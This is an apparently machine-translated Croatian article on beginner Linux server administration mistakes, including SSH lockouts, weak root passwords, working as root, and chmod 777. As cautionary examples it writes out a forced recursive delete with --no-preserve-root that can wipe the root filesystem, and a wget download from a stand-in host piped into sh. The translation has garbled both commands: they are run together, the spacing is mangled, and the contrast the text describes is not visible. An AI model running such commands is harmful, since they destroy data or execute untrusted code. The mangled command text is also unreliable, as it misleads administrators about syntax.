Phenquestions
Linux naredbeni redak administratorima poslužitelja daje kontrolu nad njihovim poslužiteljima i podacima pohranjenim na njima, ali ih malo sprječava u izvršavanju destruktivnih naredbi s posljedicama koje se ne mogu poništiti. Slučajno brisanje podataka samo je jedna vrsta pogreške koju čine novi administratori poslužitelja.
Zaključavanje tipki unutra
Administratori poslužitelja povezuju se s poslužiteljima pomoću SSH-a, usluge koja se obično izvodi na portu 22, pružajući ljusku za prijavu putem koje ovjereni korisnici mogu izvoditi naredbe na udaljenim poslužiteljima. Standardni korak sigurnosnog učvršćivanja je konfiguriranje SSH-a za prihvaćanje veza na drugom priključku. Premještanje SSH-a u slučajni priključak s velikim brojevima ograničava utjecaj napada grube sile; hakeri ne mogu pokušati zlonamjerne prijave kada ne mogu pronaći port na kojem SSH sluša.
Međutim, administrator koji konfigurira SSH za preslušavanje na drugom priključku, a zatim ponovno pokreće SSH poslužitelj, može otkriti da nisu samo hakeri ti koji su zaključani. Ako vatrozid poslužitelja nije također ponovno konfiguriran kako bi omogućio veze na novom portu, pokušaji povezivanja nikada neće doći do SSH poslužitelja. Administrator će biti zaključan sa svog poslužitelja bez ikakvog načina da riješi problem, osim što će otvoriti ulaznicu za podršku kod svog davatelja usluge hostinga. Ako promijenite SSH priključak, otvorite novi port u konfiguraciji vatrozida vašeg poslužitelja.
Odabir lako pogodljive lozinke
Napadi grube sile igra su pogađanja. Napadač pokušava isprobati mnoga korisnička imena i lozinke dok ne pogodi kombinaciju koja ih pušta. Riječnički napad je rafiniraniji pristup koji koristi popise lozinki, često iskorištene iz procurjelih baza podataka lozinki. Napadi na root račun lakši su nego na druge račune jer napadač već zna korisničko ime. Ako root račun ima jednostavnu lozinku, tada ga uopće možete hakirati.
Postoje tri načina za obranu od grube sile i napada rječnika protiv osnovnog računa.
- Odaberite dugu i složenu lozinku. Jednostavne lozinke lako je razbiti; duge i složene lozinke su nemoguće.
- Konfigurirajte SSH da onemogući root prijave. Ovo je jednostavna promjena konfiguracije, ali pripazite da je "sudo" konfiguriran tako da vašem računu omogućuje povišenje privilegija.
- Upotrijebite provjeru autentičnosti na temelju ključa umjesto lozinki. Prijave temeljene na certifikatima u potpunosti uklanjaju rizik od grube sile.
Kopiranje naredbi koje ne razumijete
Stack Exchange, Server Fault i slična web mjesta spas su za nove administratore Linux sustava, ali trebali biste izbjeći napast da kopirate i zalijepite naredbu ljuske koju ne razumijete. Koja je razlika između ove dvije naredbe?
sudo rm -rf --no -serve-root / mnt / mydrive /sudo rm -rf --no -serve-root / mnt / mydrive /
Lako je vidjeti kada se prikazuju zajedno, ali nije tako lako kada pretražujete forume tražeći naredbu za brisanje sadržaja montirane jedinice. Prva naredba briše sve datoteke na montiranom pogonu. Druga naredba briše te datoteke i sve na korijenskom datotečnom sustavu poslužitelja. Jedina razlika je prostor prije konačne kose crte.
Administratori poslužitelja mogu naići na dugačke naredbe s cjevovodima za koje se kaže da čine jedno, a rade nešto drugo. Budite posebno oprezni s naredbama koje preuzimaju kôd s interneta.
wget http: // primjer.com / verybadscript -O - | sh -Ova naredba koristi wget za preuzimanje skripte koja se cijevi u ljusku i izvršava. Da biste ovo sigurno pokrenuli, morate razumjeti što naredba radi, a također i ono što radi preuzeta skripta, uključujući bilo koji kod koji preuzeta skripta može sama preuzeti.
Prijava kao root
Iako obični korisnici mogu mijenjati datoteke samo u svojoj matičnoj mapi, korijenski korisnik malo toga ne može učiniti na Linux poslužitelju. Može pokretati bilo koji softver, čitati bilo koje podatke i brisati bilo koju datoteku.
Aplikacije koje pokreće root korisnik imaju sličnu snagu. Prikladno je biti prijavljen kao root korisnik jer ne morate stalno "sudo" ili "su", ali opasno je. Pogreška u kucanju mogla bi uništiti vaš poslužitelj za nekoliko sekundi. Buggy softver koji pokreće root korisnik mogao bi stvoriti katastrofu. Za svakodnevne operacije prijavite se kao obični korisnik i podignite root privilegije samo kada je to potrebno.
Ne učenje dozvola datotečnog sustava
Dopuštenja datotečnog sustava mogu zbuniti i frustrirati nove korisnike Linuxa. Niz dozvola poput "drwxr-xr-x" isprva izgleda besmislen, a dopuštenja vas mogu spriječiti u izmjeni datoteka i zaustaviti softver da radi ono što želite.
Administratori sustava brzo saznaju da je chmod 777 čarobna začaranost koja rješava većinu ovih problema, ali to je užasna ideja. Omogućuje svima s računom čitanje, pisanje i izvršavanje datoteke. Ako pokrenete tu naredbu na direktoriju web poslužitelja, tražite da vas hakiraju. Dozvole za Linux datoteke izgledaju složeno, ali ako odvojite nekoliko minuta da naučite kako rade, otkrit ćete logičan i fleksibilan sustav za kontrolu pristupa datotekama.
U eri koja cijeni jednostavna korisnička iskustva u odnosu na sve ostale čimbenike, Linux naredbeni redak ostaje odlučno složen i otporan na pojednostavljenje. Ne možete se zabrljati i nadati se da će sve biti u redu. Neće biti u redu i završit ćete s katastrofom na rukama.
Ali ako naučite osnove - dozvole datoteka, alate naredbenog retka i njihove opcije, najbolje sigurnosne prakse - možete postati gospodar jedne od najmoćnijih računalnih platformi ikad stvorenih.
